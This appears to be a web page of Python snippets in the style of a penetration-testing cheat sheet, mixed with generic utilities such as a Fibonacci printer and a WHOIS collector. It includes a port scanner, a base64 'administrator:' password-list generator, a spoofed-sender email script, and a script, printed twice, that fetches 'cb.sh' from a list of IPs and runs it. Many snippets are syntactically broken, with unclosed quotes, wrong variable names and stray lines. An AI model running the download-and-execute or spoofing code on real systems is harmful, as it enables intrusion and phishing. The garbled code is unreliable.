Python Scripts
(Updated: 2019-09-03) -
Python Port Scanner -
Base 64 WordList -
Windows Registry -
Search Files for Regex -
SSL HTTP Server -
HTTP Server -
Email Sender -
IP List Loop -
HTTP Banner Grabber
Python Port Scanner
import socket as sk
for port in range(1,1024):
try:
s=sk.socket(sk.AF_INET,sk.SOCK_STREAM)
s.settimeout(1000)
s.connect(('127.0.0.11,port))
print '%d:OPEN' % (port)
s.close
except: continue
Top -
Home
Base 64 WordList
#!/usr/bin/python
import base64
file1=open ("pwd.1st","r")
file2=open ("b64pwds.1st","w")
for line in filel :
clear = "administrator:" + str. strip (line)
new = base64 .encodestring (clear)
file2. write (new)
Top -
Home
CONVERT WINDOWS REGISTRY HEX FORMAT TO READABLE ASCII
import binascii, sys, string
dataFormatHex = binascii.a2b_hex(sys.argv[1])
output = ""
for char in dataFormatHex:
if char in string.printable: output += char
else: output += "."
print "\n" + output
Top -
Home
Search Files for RegEx
import glob, re
for msg in glob.glob('/tmp/*.txt'):
filer = open((msg),'r')
data = filer.read()
message = re.findall(r'[message](.*?)>/message>', data,re.DOTALL)
print "File %s contains %s" % (str(msg),message)
filer. Close()
Top -
Home
SSL HTTP Server
# Create SSL cert (follow prompts for customization)
> openssl req -new -x509 -keyout cert.pem -out cert.pm -days 365 -nodes
# Create httpserver.py
import BaseHTTPServer,SimpleHTTPServer,ssl
cert = "cert.pem"
data,re.DOTALL)
http = BaseHTTPServer.HTTPServer((192.168.1.10',443),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,certfile=cert,server_side=True)
httpd.serve_forever()
Top -
Home
HTTP Server
> python -m SimpleHTTPServer 8080
Top -
Home
PYTHON EMAIL SENDER (* SENDMAIL MUST BE INSTALLED)
#!/usr/bin/python
import smtplib, string
import os, time
os.system("/etc/init.d/sendmail start")
time.sleep(4)
HOST = "localhost"
SUBJECT = "Email from spoofed sender"
TO = "target@you.com"
FROM = "spoof@spoof.com"
TEXT = "Message Body"
BODY = string.join((
"From: %s" % FROM,
"To: %s" % TO,
"Subject: %s" % SUBJECT ,
"",
TEXT
), "\r\n")
server = smtplib.SMTP(HOST)
server.sendmail(FROM, [TO], BODY)
server.quit()
time.sleep(4)
os.system("/etc/init.d/sendmail stop")
LOOP THROUGH IP LIST, DOWNLOAD FILE OVER HTTP AND EXECUTE
#!/usr/bin/python
import urllib2, os
urls = ["1.1.1.1","2.2.2.2"]
port = "80"
payload = "cb.sh"
for url in urls:
u = "http://%s:%s/%s" % (url, port, payload)
try:
r = urllib2.urlopen(u)
wfile = open("/tmp/cb.sh","wb")
wfile.write(r.read())
wfile.close()
break
except: continue
if os.path.exists("/tmp/cb.sh"):
os.system("chmod 700 /tmp/cb.sh")
os.system("/tmp/cb.sh")
Top -
Home
LOOP THROUGH IP LIST, DOWNLOAD FILE OVER HTTP AND EXECUTE
#!/usr/bin/python
import urllib2, os
urls = ["1.1.1.1","2.2.2.2"]
port = "80"
payload = "cb.sh"
for url in urls:
u = "http://%s:%s/%s" % (url, port, payload)
try:
r = urllib2.urlopen(u)
wfile = open("/tmp/cb.sh","wb")
wfile.write(r.read())
wfile.close()
break
except: continue
if os.path.exists("/tmp/cb.sh"):
os.system("chmod 700 /tmp/cb.sh")
os.system("/tmp/cb.sh")
Top -
Home
PYTHON HTTP BANNER GRABBER (* TAKES AN IP RANGE , PORT , AND PACKET DELAY)
#!/usr/bin/python
import urllib2 , sys, time
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-t", dest="iprange",help="target IP range, i.e. 192.168.1.1-25")
parser.add_option("-p", dest="port",default="80",help="port, default=80")
parser.add_option("-d", dest="delay",default=".5",help='delay (in seconds), default=.5 seconds")
(opts, args) = parser.parse_args()
if opts .iprange is None :
parser.error ("you must supply an IP range")
ips = []
headers = {}
octets = opts.iprange.split('.)
start = octets[3].split('-')[0]
stop = octets[3].split('-')[1]
for i in range(int(start),int(stop)+1):
ips.append %s.%s.%s%d % (octets[0],octets[1],octets[2],i))
print '\nScanning IPs: %s\n' % (ips)
for ip in ips:
try:
response = urllib2.urlopen(http://%s:%s % (ip,opts.port))
headers[ip] = dict(response.info())
except Exception as e:
headers[ip] = "Error: " + str(e)
time.sleep(float(opts.delay))
for header in headers:
try:
print '%s : %s' % (header,headers[header].get('server1'))
except:
print '%s : %s' % (header,headers[header])
Top -
Home
Monitor Apache IPs
ips = {}
fh = open("/var/log/nginx/access.log", "r").readlines()
for line in fh:
ip = line.split(" ")[0]
if 6 < len(ip) <=15:
ips[ip] = ips.get(ip, 0) + 1
print ips
IP WHOIS
import json
from random import randint
import socket
import struct
import sys
from docopt import docopt
import ipcalc
from ipwhois import IPWhois
import gevent
from pyelasticsearch import ElasticSearch
from pyelasticsearch.exceptions import \
ElasticHttpError, ElasticHttpNotFoundError
import requests
def ip2long(ip):
# Convert IPv4 address in string format into an integer
:param str ip: ipv4 address
:return: ipv4 address
:rtype: integer
packed_ip = socket.inet_aton(ip)
return struct.unpack("!L", packed_ip)[0]
def get_next_ip(ip_address):
:param str ip_address: ipv4 address
:return: next ipv4 address
:rtype: str
>>> get_next_ip('0.0.0.0')
'0.0.0.1'
>>> get_next_ip('24.24.24.24')
'24.24.24.25'
>>> get_next_ip('24.24.255.255')
'24.25.0.0'
>>> get_next_ip('255.255.255.255') is None
True
assert ip_address.count('.') == 3, \
'Must be an IPv4 address in str representation'
if ip_address == '255.255.255.255':
return None
try:
return socket.inet_ntoa(struct.pack('!L', ip2long(ip_address) + 1))
except Exception, error:
print 'Unable to get next IP for %s' % ip_address
raise error
def get_netrange_end(asn_cidr):
:param str asn_cidr: ASN CIDR
:return: ipv4 address of last IP in netrange
:rtype: str
try:
last_in_netrange = \
ip2long(str(ipcalc.Network(asn_cidr).host_first())) + \
ipcalc.Network(asn_cidr).size() - 2
except ValueError, error:
print 'Issue calculating size of %s network' % asn_cidr
raise error
return socket.inet_ntoa(struct.pack('!L', last_in_netrange))
def get_next_undefined_address(ip):
# Get the next non-private IPv4 address if the address sent is private
:param str ip: IPv4 address
:return: ipv4 address of net non-private address
:rtype: str
>>> get_next_undefined_address('0.0.0.0')
'1.0.0.0'
>>> get_next_undefined_address('24.24.24.24')
'24.24.24.24'
>>> get_next_undefined_address('127.0.0.1')
'128.0.0.0'
>>> get_next_undefined_address('255.255.255.256') is None
True
try:
# Should weed out many invalid IP addresses
ipcalc.Network(ip)
except ValueError, error:
return None
defined_networks = (
'0.0.0.0/8',
'10.0.0.0/8',
'127.0.0.0/8',
'169.254.0.0/16',
'192.0.0.0/24',
'192.0.2.0/24',
'192.88.99.0/24',
'192.168.0.0/16',
'198.18.0.0/15',
'198.51.100.0/24',
'203.0.113.0/24',
'224.0.0.0/4',
'240.0.0.0/4',
'255.255.255.255/32',
)
for network_cidr in defined_networks:
if ip in ipcalc.Network(network_cidr):
return get_next_ip(get_netrange_end(network_cidr))
return ip
def break_up_ipv4_address_space(num_threads=8):
>>> break_up_ipv4_address_space() == \
[('0.0.0.0', '31.255.255.255'), ('32.0.0.0', '63.255.255.255'),\
('64.0.0.0', '95.255.255.255'), ('96.0.0.0', '127.255.255.255'),\
('128.0.0.0', '159.255.255.255'), ('160.0.0.0', '191.255.255.255'),\
('192.0.0.0', '223.255.255.255'), ('224.0.0.0', '255.255.255.255')]
True
ranges = []
multiplier = 256 / num_threads
for marker in range(0, num_threads):
starting_class_a = (marker * multiplier)
ending_class_a = ((marker + 1) * multiplier) - 1
ranges.append(('%d.0.0.0' % starting_class_a,
'%d.255.255.255' % ending_class_a))
return ranges
def get_netranges(starting_ip='1.0.0.0',
last_ip='2.0.0.0',
elastic_search_url='http://127.0.0.1:9200/',
index_name='netblocks',
doc_name='netblock', sleep_min=1, sleep_max=5):
connection = ElasticSearch(elastic_search_url)
current_ip = starting_ip
while True:
# See if we've finished the range of work
if ip2long(current_ip) > ip2long(last_ip):
return
current_ip = get_next_undefined_address(current_ip)
if current_ip == None: # No more undefined ip addresses
return
print current_ip
try:
whois_resp = IPWhois(current_ip).lookup_rws()
except Exception as error:
"""
If a message like: 'STDERR: getaddrinfo(whois.apnic.net): Name or
service not known' appears' then print it out and try the next
IP address.
"""
print type(error), error
current_ip = get_next_ip(current_ip)
if current_ip is None:
return # No more undefined ip addresses
gevent.sleep(randint(sleep_min, sleep_max))
continue
if 'asn_cidr' in whois_resp and \
whois_resp['asn_cidr'] is not None and \
whois_resp['asn_cidr'].count('.') == 3:
last_netrange_ip = get_netrange_end(whois_resp['asn_cidr'])
else:
try:
last_netrange_ip = \
whois_resp['nets'][0]['range'].split('-')[-1].strip()
assert last_netrange_ip.count('.') == 3
except:
# No match found for n + 192.0.1.0.
print 'Missing ASN CIDR in whois resp: %s' % whois_resp
current_ip = get_next_ip(current_ip)
if current_ip is None:
return # No more undefined ip addresses
gevent.sleep(randint(sleep_min, sleep_max))
continue
assert last_netrange_ip is not None and \
last_netrange_ip.count('.') == 3, \
'Unable to find last netrange ip for %s: %s' % (current_ip,
whois_resp)
# Save current_ip and whois_resp
entry = {
'netblock_start': current_ip,
'netblock_end': last_netrange_ip,
'block_size': ip2long(last_netrange_ip) - ip2long(current_ip) + 1,
'whois': json.dumps(whois_resp),
}
keys = ('cidr', 'name', 'handle', 'range', 'description',
'country', 'state', 'city', 'address', 'postal_code',
'abuse_emails', 'tech_emails', 'misc_emails', 'created',
'updated')
for _key in keys:
entry[_key] = str(whois_resp['nets'][0][_key]) \
if _key in whois_resp['nets'][0] and \
whois_resp['nets'][0][_key] else None
if _key == 'city' and entry[_key] and ' ' in entry[_key]:
entry[_key] = entry[_key].replace(' ', '_')
try:
connection.index(index_name, doc_name, entry)
except ElasticHttpError, error:
print 'At %s. Unable to save record: %s' % (current_ip, entry)
raise error
current_ip = get_next_ip(last_netrange_ip)
if current_ip is None:
return # No more undefined ip addresses
gevent.sleep(randint(sleep_min, sleep_max))
def stats(elastic_search_url, index_name, doc_name):
fields = ('country', 'city')
url = '%s/%s/_search?fields=aggregations' % (elastic_search_url, index_name)
for field in fields:
data = {
"aggs": {
field: {
"terms": {
"field": field,
"order": {"total_ips": "desc"}
},
"aggs": {
"total_ips": {"sum": {"field": "block_size"}}
}
}
}
}
resp = requests.get(url, data=json.dumps(data))
assert resp.status_code == 200, \
'Did not get HTTP 200 back: %s' % resp.status_code
_stats = json.loads(resp.content)["aggregations"][field]["buckets"]
_stats = {stat['key']: int(stat['total_ips']['value'])
for stat in _stats}
print 'Top 10 netblock locations by %s' % field
for _key in sorted(_stats, key=_stats.get, reverse=True):
print "{:14,d}".format(_stats[_key]), _key.replace('_', ' ')
print
def main(argv):
"""
:param dict argv: command line arguments
"""
opt = docopt(__doc__, argv)
if opt['collect']:
sleep_min = int(opt['--sleep_min']) \
if opt['--sleep_min'] is not None else randint(1, 5)
sleep_max = int(opt['--sleep_max']) \
if opt['--sleep_max'] is not None else randint(1, 5)
num_threads = int(opt['--threads'])
if sleep_min > sleep_max:
sleep_min, sleep_max = sleep_max, sleep_min
threads = [gevent.spawn(get_netranges, starting_id, ending_ip,
opt['<elastic_search_url>'], opt['<index_name>'],
opt['<doc_name>'], sleep_min, sleep_max)
for starting_id, ending_ip in
break_up_ipv4_address_space(num_threads)]
gevent.joinall(threads)
if opt['stats']:
stats(opt['<elastic_search_url>'],
opt['<index_name>'],
opt['<doc_name>'])
if opt['test']:
import doctest
doctest.testmod()
if __name__ == "__main__":
try:
main(sys.argv[1:])
except KeyboardInterrupt:
pass
Download Tweets
#!/usr/bin/env python
# encoding: utf-8
import tweepy #https://github.com/tweepy/tweepy
import csv
#Twitter API credentials
consumer_key = ""
consumer_secret = ""
access_key = ""
access_secret = ""
def get_all_tweets(screen_name):
#Twitter only allows access to a users most recent 3240 tweets with this method
#authorize twitter, initialize tweepy
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_key, access_secret)
api = tweepy.API(auth)
#initialize a list to hold all the tweepy Tweets
alltweets = []
#make initial request for most recent tweets (200 is the maximum allowed count)
new_tweets = api.user_timeline(screen_name = screen_name,count=200)
#save most recent tweets
alltweets.extend(new_tweets)
#save the id of the oldest tweet less one
oldest = alltweets[-1].id - 1
#keep grabbing tweets until there are no tweets left to grab
while len(new_tweets) > 0:
print "getting tweets before %s" % (oldest)
#all subsiquent requests use the max_id param to prevent duplicates
new_tweets = api.user_timeline(screen_name = screen_name,count=200,max_id=oldest)
#save most recent tweets
alltweets.extend(new_tweets)
#update the id of the oldest tweet less one
oldest = alltweets[-1].id - 1
print "...%s tweets downloaded so far" % (len(alltweets))
#transform the tweepy tweets into a 2D array that will populate the csv
outtweets = [[tweet.id_str, tweet.created_at, tweet.text.encode("utf-8")] for tweet in alltweets]
#write the csv
with open('%s_tweets.csv' % screen_name, 'wb') as f:
writer = csv.writer(f)
writer.writerow(["id","created_at","text"])
writer.writerows(outtweets)
pass
if __name__ == '__main__':
#pass in the username of the account you want to download
get_all_tweets("thealicesmith")
Current Date and Time
import datetime
now = datetime.datetime.now()
print
print "Current date and time using str method of datetime object:"
print str(now)
print
print "Current date and time using instance attributes:"
print "Current year: %d" % now.year
print "Current month: %d" % now.month
print "Current day: %d" % now.day
print "Current hour: %d" % now.hour
print "Current minute: %d" % now.minute
print "Current second: %d" % now.second
print "Current microsecond: %d" % now.microsecond
print
print "Current date and time using strftime:"
print now.strftime("%Y-%m-%d %H:%M")
Check Log File
#!/usr/bin/env python
logfile = open("/var/log/syslog", "r")
for line in logfile:
line_split = line.split()
print line_split
list = line_split[0], line_split[1], line_split[2], line_split[4]
print list
All WHOIS
# Uses pyWhois to parse WHOIS database for entered domain
import whois
# Test for entered arguments, else ask for domain
data = sys.argv[1]
if len(data) < 5:
while True:
try:
data = input("Enter a domain: ")
except ValueError:
print("Please, enter a domain name: ")
continue
else:
break
print ("Checking WHOIS Information for ", data," ...")
# Query pyWhois for information
w = whois.whois(data)
print("Domain Name: ", whois.domain_name)
print("Expiration Date: ", whois.expiration_date)
# Print important information
#
#
# import whois
# w = whois.whois('yourmom.com')
# print w
# Output will look like
# creation_date: [datetime.datetime(2012, 9, 15, 0, 0), '15 Sep 2012 20:41:00']
# domain_name: ['YOURMOM.COM', 'yourmom.com']
# updated_date: 2013-08-20 00:00:00
# whois_server: whois.enom.com
# print w.expiration_date
# print w.text
Fibonacci
# Program to display the Fibonacci sequence up to n-th term where n is provided by the user
# change this value for a different result
nterms = 100
# uncomment to take input from the user
#nterms = int(input("How many terms? "))
# first two terms
n1 = 0
n2 = 1
count = 0
# check if the number of terms is valid
if nterms <= 0:
print("Please enter a positive integer")
elif nterms == 1:
print("Fibonacci sequence up to",nterms,":")
print(n1)
else:
print("Fibonacci sequence up to",nterms,":")
while count < nterms:
print(n1,end=' , ')
nth = n1 + n2
# update values
n1 = n2
n2 = nth
count += 1
How to Sleep (Sample)
# How to sleep for 5 seconds in python:
import time
time.sleep(5)
# How to sleep for 0.5 seconds in python:
import time
time.sleep(0.5)
Search Twitter
#Importing the modules
import urllib2
import json
screen_name = "wordpress"
url = "http://api.twitter.com/1/statuses/user_timeline.json?screen_name=" + screen_name
data = json.load(urllib2.urlopen(url))
print len(data), "tweets"
for tweet in data:
print tweet['text']